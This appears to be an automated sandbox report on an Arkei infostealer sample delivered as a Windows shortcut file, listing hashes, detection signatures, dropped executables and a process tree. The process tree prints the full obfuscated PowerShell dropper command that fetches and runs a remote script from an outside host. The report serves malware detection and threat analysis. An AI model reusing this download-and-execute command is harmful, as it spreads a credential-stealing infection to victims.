arkei | 01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6

Analysis

max time kernel
36s
max time network
5s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
Size

840KB
MD5

adedd222b98f6677ac30ccc81c38954b
SHA1

1477164ec83772104e90ddda0f882283a002990f
SHA256

01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6
SHA512

085aeadd6d15025ec4e508cbcdfeb5c10b7c524510d8a4760a6d7214e57e71c8272b1071ca286f50a1dbe1abd39bf6c801365be5f6660133ccf9a9d091e98663

Score

10^/10

arkei stealer suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://timebound.ug/pps.ps1

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
suricata: ET MALWARE Windows executable base64 encoded
suricata: ET MALWARE Windows executable base64 encoded
suricata
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\01d8c4d08e555c8ea87b3b227c9ddb1a7092f56787d429c71c11589a422bbee6.lnk
1⤵
PID:4792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://timebound.ug/pps.ps1');t $nXR
  2⤵
  PID:1136
- - C:\Users\Public\hdu.exe
    "C:\Users\Public\hdu.exe"
    3⤵
    PID:3592
  - - C:\Users\Public\hdu.exe
      "C:\Users\Public\hdu.exe"
      4⤵
      PID:2096
    - - C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
        5⤵
        
        PID:1356
    - - C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe" 0
        5⤵
        
        PID:4676
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        
        PID:916
    - - C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe" 0
        5⤵
        
        PID:3108
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        
        PID:4776
    - - C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe" 0
        5⤵
        
        PID:5092
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        
        PID:2888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvdeasfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\hdu.exe

Filesize
294KB

MD5
aa0ae479ea7e7e3584addd2ef73f1661

SHA1
75fde2883928bfd541aed42f570001044155bd51

SHA256
94a6219cdaecaf679cf8de0ed994bff5256acc6201dba29d69bde7405982eb10

SHA512
3ed101533d477dd4dcaf0c4af5f6123e62a903ef9245d6b791a26203410d8a65134ff9cc37650770bb5cfb45fc68d31072458f92d4a6e11ae6278c0335435bb2

Download Submit
C:\Users\Public\hdu.exe

Filesize
341KB

MD5
a21f85b88a3c424972498c120d1e52f0

SHA1
bd944b403b0ff523bb7065e4af26fcf8ffb3363e

SHA256
ef0295372522eaf2d99eb0ebc31fd37ab24271f917fde26143f15ce4e1161ad2

SHA512
75065cc12043092e87eabbc635188e9a3379a5ae0eb5825e07db334d65766a16cecbda30a901e099e9fa776bbed9d6ce342491bd295de7aa81ca85d868240b70

Download Submit
C:\Users\Public\hdu.exe

Filesize
358KB

MD5
274f86a032090d1285c806de158d568b

SHA1
a2e4177b2ed83dd3da377305b57b80315a86c80d

SHA256
508294970beaf59f6c4b44d7246e765ca9fb1bc86e507db42c2baa7d90162dd2

SHA512
d348f4f79bad99c38320dc19ed1ada5c78193a7a4a90a3d588f71071fe21f31710c077e4e7aaa4c0a73cd104e38f805ad245a931c8bb3b5f4e17b4cdc9d97157

Download Submit
memory/916-163-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/916-173-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/1136-132-0x00007FFCBE070000-0x00007FFCBEB31000-memory.dmp

Filesize
10.8MB

Download
memory/1136-131-0x00000241A5530000-0x00000241A5552000-memory.dmp

Filesize
136KB

Download
memory/2096-143-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2888-172-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2888-169-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/3108-158-0x0000000004FD0000-0x0000000005062000-memory.dmp

Filesize
584KB

Download
memory/3108-154-0x00000000056C0000-0x0000000005C64000-memory.dmp

Filesize
5.6MB

Download
memory/3592-140-0x0000000002110000-0x0000000002115000-memory.dmp

Filesize
20KB

Download
memory/4676-159-0x00000000048C0000-0x00000000048CA000-memory.dmp

Filesize
40KB

Download
memory/4776-174-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/5092-150-0x00000000002F0000-0x000000000030E000-memory.dmp

Filesize
120KB

Download